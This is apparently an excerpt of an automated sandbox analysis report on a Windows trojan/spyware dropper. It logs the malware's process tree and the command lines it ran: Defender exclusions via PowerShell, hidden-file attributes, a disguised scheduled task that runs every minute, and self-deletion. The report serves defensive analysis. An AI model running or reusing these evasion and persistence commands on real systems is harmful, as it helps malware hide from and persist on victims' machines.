                    Source: 92133eb3c2.exe.9.drStatic PE information: Section: gptxkuce ZLIB complexity 0.9902796749553969
                    Source: random[3].exe0.9.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                    Source: random[3].exe0.9.drStatic PE information: Section: gghkcrho ZLIB complexity 0.9945929092969679
                    Source: 224de4e34e.exe.9.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                    Source: 224de4e34e.exe.9.drStatic PE information: Section: gghkcrho ZLIB complexity 0.9945929092969679
                    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: skotes.exe.1.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: 08b7ae794c.exe.9.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 08b7ae794c.exe.9.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: random[2].exe1.9.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: random[2].exe1.9.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@96/105@0/14
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeMutant created: \Sessions\1\BaseNamedObjects\KHXAIlccOnv2cQo9
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeMutant created: \Sessions\1\BaseNamedObjects\dpmm9KHGR0UIHU3V
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5208
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:340:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: 2gwmtZs.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5208 -s 784
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSection loaded: wintypes.dllJump to behavior
